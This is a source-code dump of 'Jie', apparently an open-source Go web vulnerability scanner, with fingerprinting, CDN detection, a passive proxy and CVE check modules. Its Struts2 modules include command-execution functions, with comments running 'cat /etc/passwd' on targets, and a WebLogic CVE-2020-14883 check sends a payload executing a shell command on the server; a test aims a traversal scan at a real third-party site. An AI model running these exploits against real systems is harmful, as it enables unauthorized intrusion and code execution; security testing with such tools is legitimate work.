"github.com/wasilibs/go-re2" 5 | "strings" 6 | ) 7 | 8 | /** 9 | @author yhy 10 | @since 2023/10/13 11 | @desc //TODO 12 | **/ 13 | 14 | type RubyPlugin struct{} 15 | 16 | func (p RubyPlugin) Fingerprint(body string, headers map[string][]string) bool { 17 | if v, ok := headers["Server"]; ok { 18 | re := regexp.MustCompile(`(?:Mongrel|WEBrick|Ruby)`) 19 | if re.FindStringIndex(strings.Join(v, "")) != nil { 20 | return true 21 | } 22 | } 23 | return false 24 | } 25 | 26 | func (p RubyPlugin) Name() string { 27 | return "Ruby" 28 | } 29 | -------------------------------------------------------------------------------- /fingprints/type.go: -------------------------------------------------------------------------------- 1 | package fingprints 2 | 3 | /** 4 | @author yhy 5 | @since 2023/10/13 6 | @desc //TODO 7 | **/ 8 | 9 | type Plugin interface { 10 | Fingerprint(body string, headers map[string][]string) bool 11 | Name() string 12 | } 13 | -------------------------------------------------------------------------------- /images/image-20231011213912055.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhy0/Jie/2836308c42e92d9fa20048b9a629322984c56309/images/image-20231011213912055.png -------------------------------------------------------------------------------- /images/image-20240101121809597.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhy0/Jie/2836308c42e92d9fa20048b9a629322984c56309/images/image-20240101121809597.png -------------------------------------------------------------------------------- /images/image-20240101121931631.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhy0/Jie/2836308c42e92d9fa20048b9a629322984c56309/images/image-20240101121931631.png -------------------------------------------------------------------------------- 
/images/image-20240101121957058.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhy0/Jie/2836308c42e92d9fa20048b9a629322984c56309/images/image-20240101121957058.png -------------------------------------------------------------------------------- /images/passive-scan-client.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhy0/Jie/2836308c42e92d9fa20048b9a629322984c56309/images/passive-scan-client.png -------------------------------------------------------------------------------- /lib/cdncheck/README.md: -------------------------------------------------------------------------------- 1 | 修改自:https://github.com/projectdiscovery/cdncheck 2 | 增加了国内CDN IP判断,及大部分主流CDN 域名判断、主流云资产识别 3 | 4 | 5 | - Baidu-加速乐 (创宇云盾) 6 | - 网宿 CDN 7 | - 腾讯云CDN 8 | - 阿里云 CDN 9 | - 百度智能云CDN 10 | 11 | 12 | 13 | 如要增加其它CDN或WAF 请更新: 14 | sources_data.json 文件并重新编译 15 | 16 | 17 | 后面仅更新sources_data.json 不再更新Releases,请自行编译 18 | -------------------------------------------------------------------------------- /lib/cdncheck/cdncheck_test.go: -------------------------------------------------------------------------------- 1 | package cdncheck 2 | 3 | import ( 4 | "github.com/stretchr/testify/require" 5 | "net" 6 | "testing" 7 | ) 8 | 9 | func TestCDNCheckValid(t *testing.T) { 10 | client := New() 11 | 12 | found, provider, itemType, err := client.Check(net.ParseIP("173.245.48.12")) 13 | require.Equal(t, "cloudflare", provider, "could not get correct provider") 14 | require.Equal(t, "waf", itemType, "could not get correct item type") 15 | require.Nil(t, err, "Could not check ip in ranger") 16 | require.True(t, found, "Could not check cloudlfare ip blacklist") 17 | 18 | found, _, _, err = client.Check(net.ParseIP("127.0.0.1")) 19 | require.Nil(t, err, "Could not check ip in ranger") 20 | require.False(t, found, "Localhost IP found in blacklist") 21 | } 22 | 
-------------------------------------------------------------------------------- /lib/cdncheck/generate/options.go: -------------------------------------------------------------------------------- 1 | package generate 2 | 3 | import ( 4 | "net/http" 5 | "os" 6 | ) 7 | 8 | type Options struct { 9 | IPInfoToken string 10 | HTTPClient *http.Client 11 | } 12 | 13 | // HasAuthInfo returns true if auth info has been provided 14 | func (options *Options) HasAuthInfo() bool { 15 | return options.IPInfoToken != "" 16 | } 17 | 18 | // ParseFromEnv parses auth tokens from env or file 19 | func (options *Options) ParseFromEnv() { 20 | if ipInfoToken := os.Getenv("IPINFO_TOKEN"); ipInfoToken != "" { 21 | options.IPInfoToken = ipInfoToken 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /lib/cdncheck/sources_data.go: -------------------------------------------------------------------------------- 1 | package cdncheck 2 | 3 | import ( 4 | _ "embed" 5 | "encoding/json" 6 | "fmt" 7 | ) 8 | 9 | //go:embed sources_data.json 10 | var data string 11 | 12 | var generatedData InputCompiled 13 | 14 | func init() { 15 | if err := json.Unmarshal([]byte(data), &generatedData); err != nil { 16 | panic(fmt.Sprintf("Could not parse cidr data: %s", err)) 17 | } 18 | DefaultCDNProviders = mapKeys(generatedData.CDN) 19 | DefaultWafProviders = mapKeys(generatedData.WAF) 20 | DefaultCloudProviders = mapKeys(generatedData.Cloud) 21 | } 22 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "github.com/yhy0/Jie/cmd" 4 | 5 | /** 6 | @author: yhy 7 | @since: 2023/1/27 8 | @desc: //TODO 9 | **/ 10 | 11 | func main() { 12 | cmd.Execute() 13 | } 14 | -------------------------------------------------------------------------------- /pkg/mitmproxy/README.md: 
-------------------------------------------------------------------------------- 1 | ## 被动扫描 2 | 3 | 使用[go-mitmproxy](https://github.com/lqqyt2423/go-mitmproxy) -------------------------------------------------------------------------------- /pkg/mitmproxy/go-mitmproxy/addon/decoder.go: -------------------------------------------------------------------------------- 1 | package addon 2 | 3 | import "github.com/yhy0/Jie/pkg/mitmproxy/go-mitmproxy/proxy" 4 | 5 | // decode content-encoding then respond to client 6 | 7 | type Decoder struct { 8 | proxy.BaseAddon 9 | } 10 | 11 | func (d *Decoder) Response(f *proxy.Flow) { 12 | f.Response.ReplaceToDecodedBody() 13 | } 14 | -------------------------------------------------------------------------------- /pkg/mitmproxy/go-mitmproxy/cert/cert_test.go: -------------------------------------------------------------------------------- 1 | package cert 2 | 3 | import ( 4 | "bytes" 5 | "io/ioutil" 6 | "reflect" 7 | "testing" 8 | ) 9 | 10 | func TestGetStorePath(t *testing.T) { 11 | path, err := getStorePath("") 12 | if err != nil { 13 | t.Fatal(err) 14 | } 15 | if path == "" { 16 | t.Fatal("should have path") 17 | } 18 | } 19 | 20 | func TestNewCA(t *testing.T) { 21 | ca, err := NewCA("") 22 | if err != nil { 23 | t.Fatal(err) 24 | } 25 | 26 | data := make([]byte, 0) 27 | buf := bytes.NewBuffer(data) 28 | 29 | err = ca.saveTo(buf) 30 | if err != nil { 31 | t.Fatal(err) 32 | } 33 | 34 | fileContent, err := ioutil.ReadFile(ca.caFile()) 35 | if err != nil { 36 | t.Fatal(err) 37 | } 38 | 39 | if !reflect.DeepEqual(fileContent, buf.Bytes()) { 40 | t.Fatal("pem content should equal") 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /pkg/mitmproxy/go-mitmproxy/helper/host.go: -------------------------------------------------------------------------------- 1 | package helper 2 | 3 | import "strings" 4 | 5 | // MatchHost detect hosts is match address 6 | func MatchHost(address string, 
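hosts []string) bool {
7 | 	hostname, port := splitHostPort(address)
8 | 	for _, host := range hosts {
9 | 		h, p := splitHostPort(host)
10 | 		if matchHostname(hostname, h) && (p == "" || p == port) {
11 | 			return true
12 | 		}
13 | 	}
14 | 	return false
15 | }
16 | 
17 | func matchHostname(hostname string, h string) bool {
18 | 	if h == "*" {
19 | 		return true
20 | 	}
21 | 	if strings.HasPrefix(h, "*.") {
22 | 		return hostname == h[2:] || strings.HasSuffix(hostname, h[1:])
23 | 	}
24 | 	return h == hostname
25 | }
26 | 
27 | func splitHostPort(address string) (string, string) {
28 | 	index := strings.LastIndex(address, ":")
29 | 	if index == -1 {
30 | 		return address, ""
31 | 	}
32 | 	return address[:index], address[index+1:]
33 | }
34 | 
--------------------------------------------------------------------------------
/pkg/mitmproxy/go-mitmproxy/helper/tls.go:
--------------------------------------------------------------------------------
1 | package helper
2 | 
3 | import (
4 | 	"io"
5 | 	"os"
6 | 	"sync"
7 | 
8 | 	log "github.com/sirupsen/logrus"
9 | )
10 | 
11 | // TLS key log settings, so that Wireshark can decrypt the HTTPS traffic.
12 | var tlsKeyLogWriter io.Writer
13 | var tlsKeyLogOnce sync.Once
14 | 
15 | // GetTlsKeyLogWriter returns the writer for TLS key log lines. The file named
16 | // by the SSLKEYLOGFILE environment variable is opened on the first call only.
17 | // The result is nil when the variable is unset or empty, or when the file
18 | // cannot be opened.
19 | func GetTlsKeyLogWriter() io.Writer {
20 | 	tlsKeyLogOnce.Do(func() {
21 | 		logfile := os.Getenv("SSLKEYLOGFILE")
22 | 		if logfile == "" {
23 | 			return
24 | 		}
25 | 
26 | 		// The key log holds the session secrets that decrypt captured traffic,
27 | 		// so a newly created file is owner-only (0600 instead of 0666). The mode
28 | 		// applies on creation only; an existing file keeps its permissions.
29 | 		writer, err := os.OpenFile(logfile, os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0600)
30 | 		if err != nil {
31 | 			log.Debugf("getTlsKeyLogWriter OpenFile error: %v", err)
32 | 			return
33 | 		}
34 | 
35 | 		tlsKeyLogWriter = writer
36 | 	})
37 | 	return tlsKeyLogWriter
38 | }
39 | 
--------------------------------------------------------------------------------
/pkg/mode/passive.go:
--------------------------------------------------------------------------------
1 | package mode
2 | 
3 | import (
4 | 	"github.com/yhy0/Jie/pkg/mitmproxy"
5 | 	"github.com/yhy0/logging"
6 | )
7 | 
8 | /**
9 |   @author: yhy
10 |   @since: 2023/1/11
11 |   @desc: passive proxy data handling
12 | **/
13 | 
14 | func Passive() {
15 | 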
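logging.Logger.Debugln("Start passive traffic monitoring scan")
16 | 	mitmproxy.NewMitmproxy()
17 | }
18 | 
--------------------------------------------------------------------------------
/pkg/protocols/httpx/fuzz.go:
--------------------------------------------------------------------------------
1 | package httpx
2 | 
3 | /**
4 |   @author: yhy
5 |   @since: 2023/2/10
6 |   @desc:
7 | **/
8 | 
9 | // Fuzz fuzzes the specified parameters
10 | 
--------------------------------------------------------------------------------
/pkg/protocols/httpx/proxy.go:
--------------------------------------------------------------------------------
1 | package httpx
2 | 
3 | import (
4 | 	"errors"
5 | 	"net/url"
6 | )
7 | 
8 | // ValidateProxyURL parses proxy and returns its scheme when the scheme is
9 | // http, https or socks5 and the URL names a host. Anything else yields an
10 | // error describing the expected format.
11 | func ValidateProxyURL(proxy string) (string, error) {
12 | 	u, err := url.Parse(proxy)
13 | 	// A supported scheme alone is not enough: "http://" parses without error
14 | 	// but has no host, which the format in the error message requires.
15 | 	if err != nil || u.Host == "" || !isSupportedProtocol(u.Scheme) {
16 | 		return "", errors.New("invalid proxy format (It should be http[s]/socks5://[username:password@]host:port)")
17 | 	}
18 | 	return u.Scheme, nil
19 | }
20 | 
21 | // isSupportedProtocol reports whether value is one of the supported proxy
22 | // schemes: http, https or socks5.
23 | func isSupportedProtocol(value string) bool {
24 | 	return value == "http" || value == "https" || value == "socks5"
25 | }
26 | 
--------------------------------------------------------------------------------
/pkg/util/iconhash.go:
--------------------------------------------------------------------------------
1 | package util
2 | 
3 | import (
4 | 	"bytes"
5 | 	"encoding/base64"
6 | 	"github.com/spaolacci/murmur3"
7 | )
8 | 
9 | // Reference: https://github.com/Becivells/iconhash
10 | 
11 | // Mmh3Hash32 computes the 32-bit murmur3 (mmh3) hash of raw as an int32
12 | func Mmh3Hash32(raw []byte) int32 {
13 | 	var h32 = murmur3.New32()
14 | 	h32.Write(raw)
15 | 	return int32(h32.Sum32())
16 | }
17 | 
18 | func Base64Encode(braw []byte) []byte {
19 | 	bckd := base64.StdEncoding.EncodeToString(braw)
20 | 	var buffer bytes.Buffer
21 | 	for i := 0; i < len(bckd); i++ {
22 | 		ch := bckd[i]
23 | 		buffer.WriteByte(ch)
24 | 		if (i+1)%76 == 0 {
25 | 			buffer.WriteByte('\n')
26 | 		}
27 | 	}
28 | 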
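buffer.WriteByte('\n')
29 | 	return buffer.Bytes()
30 | }
31 | 
--------------------------------------------------------------------------------
/pkg/util/regexp.go:
--------------------------------------------------------------------------------
1 | package util
2 | 
3 | import (
4 | 	regexp "github.com/wasilibs/go-re2"
5 | )
6 | 
7 | /**
8 |   @author: yhy
9 |   @since: 2023/2/10
10 |   @desc: //TODO
11 | **/
12 | 
13 | // MatchAnyOfRegexp returns true and the first pattern in regexps that matches
14 | // match, or false and "" when none does. A pattern that does not compile is
15 | // skipped, the same way RegexpStr treats it.
16 | func MatchAnyOfRegexp(regexps []string, match string) (bool, string) {
17 | 	for _, value := range regexps {
18 | 		// Compile instead of MustCompile: one malformed pattern in the list
19 | 		// must not panic and take the whole process down.
20 | 		regex, err := regexp.Compile(value)
21 | 		if err != nil {
22 | 			continue
23 | 		}
24 | 		if regex.MatchString(match) {
25 | 			return true, value
26 | 		}
27 | 	}
28 | 
29 | 	return false, ""
30 | }
31 | 
32 | // RegexpStr reports whether any of patterns matches str. Patterns that fail
33 | // to compile are skipped.
34 | func RegexpStr(patterns []string, str string) bool {
35 | 	for _, pattern := range patterns {
36 | 		match, err := regexp.MatchString(pattern, str)
37 | 		if err != nil {
38 | 			continue
39 | 		}
40 | 		if match {
41 | 			return true
42 | 		}
43 | 	}
44 | 
45 | 	return false
46 | }
47 | 
--------------------------------------------------------------------------------
/scan/PerFile/sql/images/image-20230207205442610.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yhy0/Jie/2836308c42e92d9fa20048b9a629322984c56309/scan/PerFile/sql/images/image-20230207205442610.png
--------------------------------------------------------------------------------
/scan/PerFile/sql/sqlmap/type.go:
--------------------------------------------------------------------------------
1 | package sqlmap
2 | 
3 | /**
4 |   @author yhy
5 |   @since 2023/10/27
6 |   @desc //TODO
7 | **/
8 | 
9 | // http://127.0.0.1:8775/option/taskid/list
10 | type option struct {
11 | 	Url string `json:"url"`
12 | 	Method string `json:"method"`
13 | 	Headers string `json:"headers"`
14 | 	Data string `json:"data"`
15 | 	RandomAgent bool `json:"randomAgent"`
16 | 	Level int `json:"level"`
17 | 	Risk int `json:"risk"`
18 | 	Proxy string `json:"proxy"`
19 | 	Verbose int `json:"verbose"`
20 | }
21 | 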
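--------------------------------------------------------------------------------
/scan/PerFile/xss/xss.go:
--------------------------------------------------------------------------------
1 | package xss
2 | 
3 | import (
4 | 	"github.com/yhy0/Jie/pkg/input"
5 | 	"github.com/yhy0/Jie/pkg/protocols/httpx"
6 | 	"sync"
7 | )
8 | 
9 | /**
10 |   @author: yhy
11 |   @since: 2023/1/5
12 |   @desc: semantic analysis, prototype pollution, DOM taint propagation analysis
13 | **/
14 | 
15 | // Plugin is the xss scan plugin. SeenRequests records the keys that IsScanned
16 | // has already been asked about.
17 | type Plugin struct {
18 | 	SeenRequests sync.Map
19 | }
20 | 
21 | // Scan runs Audit on in unless IsScanned reports in.UniqueId as already seen.
22 | // target and path are not used in this method.
23 | func (p *Plugin) Scan(target string, path string, in *input.CrawlResult, client *httpx.Client) {
24 | 	if p.IsScanned(in.UniqueId) {
25 | 		return
26 | 	}
27 | 	Audit(in, client)
28 | 	// DOM checks already run with the active crawler, so they happen by default
29 | 	// look for xss through prototype pollution
30 | 	// Prototype(in.Url)
31 | }
32 | 
33 | // IsScanned reports whether key was recorded by an earlier call and records it
34 | // otherwise. An empty key is never recorded and always yields false.
35 | func (p *Plugin) IsScanned(key string) bool {
36 | 	if key == "" {
37 | 		return false
38 | 	}
39 | 	// LoadOrStore checks and records in one atomic step. A separate Load and
40 | 	// Store lets two goroutines both see the key as new and scan it twice.
41 | 	_, seen := p.SeenRequests.LoadOrStore(key, true)
42 | 	return seen
43 | }
44 | 
45 | // Name returns the plugin name, "xss".
46 | func (p *Plugin) Name() string {
47 | 	return "xss"
48 | }
49 | 
--------------------------------------------------------------------------------
/scan/PerFolder/log4j/log4j.go:
--------------------------------------------------------------------------------
1 | package log4j
2 | 
3 | import (
4 | 	"github.com/yhy0/Jie/pkg/input"
5 | 	"github.com/yhy0/Jie/pkg/protocols/httpx"
6 | 	"github.com/yhy0/Jie/scan/Pocs/pocs_go/log4j"
7 | 	"sync"
8 | )
9 | 
10 | /**
11 |   @author: yhy
12 |   @since: 2023/12/29
13 |   @desc: //TODO
14 | **/
15 | 
16 | type Plugin struct {
17 | 	SeenRequests sync.Map
18 | }
19 | 
20 | func (p *Plugin) Name() string {
21 | 	return "log4j"
22 | }
23 | 
24 | func (p *Plugin) Scan(target string, path string, in *input.CrawlResult, client *httpx.Client) {
25 | 	if p.IsScanned(in.UniqueId) {
26 | 		return
27 | 	}
28 | 
29 | 	log4j.Scan(target, in.Method, in.RequestBody, client)
30 | }
31 | 
32 | func (p *Plugin) IsScanned(key string) bool {
33 | 	if key == "" {
34 | 		return false
35 | 	}
36 | 	if _, ok := 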
p.SeenRequests.Load(key); ok { 37 | return true 38 | } 39 | p.SeenRequests.Store(key, true) 40 | return false 41 | } 42 | -------------------------------------------------------------------------------- /scan/PerFolder/traversal/README.md: -------------------------------------------------------------------------------- 1 | ## 目录遍历 2 | 3 | ### Nginx 4 | 5 | https://labs.hakaioffsec.com/nginx-alias-traversal/ 6 | 7 | https://github.com/vulhub/vulhub/blob/6a142caa19620bffa4cda9989697afd5b4136c87/nginx/insecure-configuration/README.md 8 | -------------------------------------------------------------------------------- /scan/PerFolder/traversal/traversal_test.go: -------------------------------------------------------------------------------- 1 | package traversal 2 | 3 | import ( 4 | "github.com/logrusorgru/aurora" 5 | "github.com/yhy0/Jie/conf" 6 | "github.com/yhy0/Jie/pkg/output" 7 | "github.com/yhy0/logging" 8 | "testing" 9 | ) 10 | 11 | /** 12 | @author yhy 13 | @since 2023/8/15 14 | @desc //TODO 15 | **/ 16 | 17 | func TestTraversal(t *testing.T) { 18 | logging.Logger = logging.New(true, "", "agent", false) 19 | conf.GlobalConfig = &conf.Config{} 20 | conf.GlobalConfig.Http.Proxy = "" 21 | 22 | // 获取扫描结果 23 | go func() { 24 | for v := range output.OutChannel { 25 | logging.Logger.Infoln(aurora.Red(v.PrintScreen()).String()) 26 | } 27 | }() 28 | 29 | NginxAlias("https://md.huodong.baidu.com/", "", "") 30 | } 31 | -------------------------------------------------------------------------------- /scan/Pocs/apollo/apollo_test.go: -------------------------------------------------------------------------------- 1 | package apollo 2 | 3 | import ( 4 | "github.com/yhy0/Jie/conf" 5 | "github.com/yhy0/logging" 6 | "testing" 7 | ) 8 | 9 | func TestApollo(t *testing.T) { 10 | logging.Logger = logging.New(true, "", "agent", true) 11 | conf.GlobalConfig = &conf.Config{} 12 | conf.GlobalConfig.Http.Proxy = "http://127.0.0.1:8080" 13 | 14 | Run("http://172.16.39.132:8091", 
"http://172.16.39.132:8089") 15 | } 16 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/README.md: -------------------------------------------------------------------------------- 1 | ## struts2 扫描和利用 2 | 3 | https://github.com/xfiftyone/STS2G 4 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-005/s2-005.go: -------------------------------------------------------------------------------- 1 | package s2_005 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | "log" 8 | "net/url" 9 | "strings" 10 | ) 11 | 12 | func Check(targetUrl string) { 13 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s005_check) 14 | if utils.IfContainsStr(respString, utils.Checkflag) { 15 | color.Red("*Found Struts2-005!") 16 | } else { 17 | fmt.Println("Struts2-005 Not Vulnerable.") 18 | } 19 | } 20 | func GetWebPath(targetUrl string) { 21 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s005_webpath) 22 | log.Println(respString) 23 | } 24 | 25 | func ExecCommand(targetUrl string, command string) { 26 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s005_exec(command)) 27 | tmpResult := strings.Replace(url.QueryEscape(respString), "%00", "", -1) 28 | fmt.Println(url.QueryUnescape(tmpResult)) 29 | } 30 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-007/s2-007.go: -------------------------------------------------------------------------------- 1 | package s2_007 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | ) 8 | 9 | func Check(targeturl string, postData string) { 10 | respString := utils.PostFunc4Struts2(targeturl, postData, "", utils.POC_s007_check) 11 | if utils.IfContainsStr(respString, "6308") { 12 | color.Red("*Found Struts2-007!") 13 | } 
else { 14 | fmt.Println("Struts2-007 Not Vulnerable.") 15 | } 16 | 17 | } 18 | func ExecCommand(targeturl string, command string, postData string) { 19 | respString := utils.PostFunc4Struts2(targeturl, postData, "", utils.POC_s007_exec(command)) 20 | cmdout := utils.GetBetweenStr(respString, "s007execstart", "s007execend")[13:] 21 | fmt.Println(cmdout) 22 | } 23 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-008/s2-008.go: -------------------------------------------------------------------------------- 1 | package s2_008 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | ) 8 | 9 | func Check(targetUrl string) { 10 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s008_check) 11 | if utils.IfContainsStr(respString, utils.Checkflag) { 12 | color.Red("*Found Struts2-008!") 13 | } else { 14 | fmt.Println("Struts2-008 Not Vulnerable.") 15 | } 16 | } 17 | func ExecCommand(targetUrl string, command string) { 18 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s008_exec(command)) 19 | fmt.Println(respString) 20 | } 21 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-013/s2-013.go: -------------------------------------------------------------------------------- 1 | package s2_013 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | "net/url" 8 | "strings" 9 | ) 10 | 11 | func Check(targetUrl string) { 12 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s013_check) 13 | if utils.IfContainsStr(respString, "6308") { 14 | color.Red("*Found Struts2-013!") 15 | } else { 16 | fmt.Println("Struts2-013 Not Vulnerable.") 17 | } 18 | } 19 | func ExecCommand(targetUrl string, command string) { 20 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s013_exec(command)) 21 | respString = 
strings.Replace(url.QueryEscape(respString), "%00", "", -1) 22 | fmt.Println(url.QueryUnescape(respString)) 23 | } 24 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-015/s2-015.go: -------------------------------------------------------------------------------- 1 | package s2_015 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | ) 8 | 9 | func Check(targetUrl string) { 10 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s015_check) 11 | if utils.IfContainsStr(respString, "6308") { 12 | color.Red("*Found Struts2-015!") 13 | } else { 14 | fmt.Println("Struts2-015 Not Vulnerable.") 15 | } 16 | } 17 | func ExecCommand(targetUrl string, command string) { 18 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s015_exec(command)) 19 | execResult := utils.GetBetweenStr(respString, "s015execstart", "s015execend") 20 | fmt.Println(execResult[13:]) 21 | } 22 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-045/s2-045.go: -------------------------------------------------------------------------------- 1 | package s2_045 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | ) 8 | 9 | /* 10 | ST2SG.exe --url http://192.168.123.128:8080/S2-045/orders --vn 45 --mode exec --cmd "cat /etc/passwd" 11 | */ 12 | func Check(targetUrl string) { 13 | respString := utils.PostFunc4Struts2(targetUrl, "", "qwer", utils.POC_s045_check) 14 | if utils.IfContainsStr(respString, utils.Checkflag) { 15 | color.Red("*Found Struts2-045!") 16 | } else { 17 | fmt.Println("Struts2-045 Not Vulnerable.") 18 | } 19 | } 20 | func GetWebpath(targetUrl string) { 21 | webpath := utils.PostFunc4Struts2(targetUrl, "", "qwer", utils.POC_s045_webpath) 22 | color.Green(webpath) 23 | 24 | } 25 | func ExecCommand(targetUrl string, command string) { 
26 | respString := utils.PostFunc4Struts2(targetUrl, "", "qwer", utils.POC_s045_exec(command)) 27 | fmt.Println(respString) 28 | } 29 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-053/s2-053.go: -------------------------------------------------------------------------------- 1 | package s2_053 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | "net/url" 8 | ) 9 | 10 | /* 11 | ST2SG.exe --url http://192.168.123.128:8080/S2-053/ --vn 53 --data "name=fuckit" --mode exec --cmd "cat /etc/passwd" 12 | */ 13 | 14 | func Check(targetUrl string, postData string) { 15 | respString := utils.PostFunc4Struts2(targetUrl, postData, "", utils.POC_s053_check) 16 | if utils.IfContainsStr(respString, "6308") { 17 | color.Red("*Found Struts2-053!") 18 | } else { 19 | fmt.Println("Struts2-053 Not Vulnerable.") 20 | } 21 | 22 | } 23 | func ExecCommand(targetUrl string, command string, postData string) { 24 | respString := utils.PostFunc4Struts2(targetUrl, postData, "", utils.POC_s053_exec(command)) 25 | execResult := utils.GetBetweenStr(respString, "s053execstart", "s053execend") 26 | fmt.Println(url.QueryUnescape(execResult)) 27 | } 28 | -------------------------------------------------------------------------------- /scan/Pocs/java/weblogic/CVE_2014_4210.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "github.com/yhy0/logging" 6 | ) 7 | 8 | func CVE_2014_4210(url string, client *httpx.Client) bool { 9 | if req, err := client.Request(url+"/uddiexplorer/SearchPublicRegistries.jsp", "GET", "", nil); err == nil { 10 | if req.StatusCode == 200 { 11 | logging.Logger.Infoln("[Vulnerable] CVE_2014_4210 ", url) 12 | return true 13 | } 14 | } 15 | logging.Logger.Debugln("[Safety] CVE_2014_4210 ", url) 16 | return false 17 | } 18 | 
-------------------------------------------------------------------------------- /scan/Pocs/java/weblogic/CVE_2018_2894.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "github.com/yhy0/logging" 6 | ) 7 | 8 | func CVE_2018_2894(url string, client *httpx.Client) bool { 9 | if req, err := client.Request(url+"/ws_utc/begin.do", "GET", "", nil); err == nil { 10 | if req2, err2 := client.Request(url+"/ws_utc/config.do", "GET", "", nil); err2 == nil { 11 | if req.StatusCode == 200 || req2.StatusCode == 200 { 12 | logging.Logger.Infoln("[Vulnerable] CVE_2018_2894 ", url) 13 | return true 14 | } 15 | } 16 | } 17 | logging.Logger.Debugln("[Safety] CVE_2018_2894 ", url) 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /scan/Pocs/java/weblogic/CVE_2020_14882.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "github.com/yhy0/logging" 6 | "strings" 7 | ) 8 | 9 | func CVE_2020_14882(url string, client *httpx.Client) bool { 10 | if req, err := client.Request(url+"/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=a", "GET", "", nil); err == nil { 11 | if req.StatusCode == 200 && strings.Contains(req.Body, "/console/dashboard") { 12 | logging.Logger.Infoln("[Vulnerable] CVE_2020_14882 ", url) 13 | return true 14 | } 15 | } 16 | logging.Logger.Debugln("[Safety] CVE_2020_14882 ", url) 17 | return false 18 | } 19 | -------------------------------------------------------------------------------- /scan/Pocs/java/weblogic/CVE_2020_14883.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "github.com/yhy0/logging" 6 | ) 7 | 8 | func 
CVE_2020_14883(url string, client *httpx.Client) bool { 9 | if _, err := client.Request(url+"/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch%20../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/css/test.txt%27);%22)", "GET", "", nil); err == nil { 10 | if req2, err2 := client.Request(url+"/console/framework/skins/wlsconsole/css/test.txt", "GET", "", nil); err2 == nil { 11 | if req2.StatusCode == 200 { 12 | logging.Logger.Infoln("[Vulnerable] CVE_2020_14883 ", url) 13 | return true 14 | } 15 | } 16 | } 17 | logging.Logger.Debugln("[Safety] CVE_2020_14883 ", url) 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /scan/Pocs/java/weblogic/CVE_2021_2109.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "github.com/yhy0/logging" 6 | "strings" 7 | ) 8 | 9 | func CVE_2021_2109(url string, client *httpx.Client) bool { 10 | if req, err := client.Request(url+"/console/css/%252e%252e%252f/consolejndi.portal", "GET", "", nil); err == nil { 11 | if req.StatusCode == 200 && strings.Contains(req.Body, "Weblogic") { 12 | logging.Logger.Infoln("[Vulnerable] CVE_2021_2109 ", url) 13 | return true 14 | } 15 | } 16 | logging.Logger.Debugln("[Safety] CVE_2021_2109 ", url) 17 | return false 18 | } 19 | -------------------------------------------------------------------------------- /scan/Pocs/nuclei/nuclei_test.go: -------------------------------------------------------------------------------- 1 | package nuclei 2 | 3 | import ( 4 | "fmt" 5 | "github.com/logrusorgru/aurora" 6 | "github.com/yhy0/Jie/conf" 7 | "github.com/yhy0/Jie/pkg/output" 8 | "github.com/yhy0/logging" 9 | "testing" 10 | "time" 11 | ) 12 | 13 | /** 14 | @author: yhy 15 | @since: 2023/1/31 16 | @desc: 
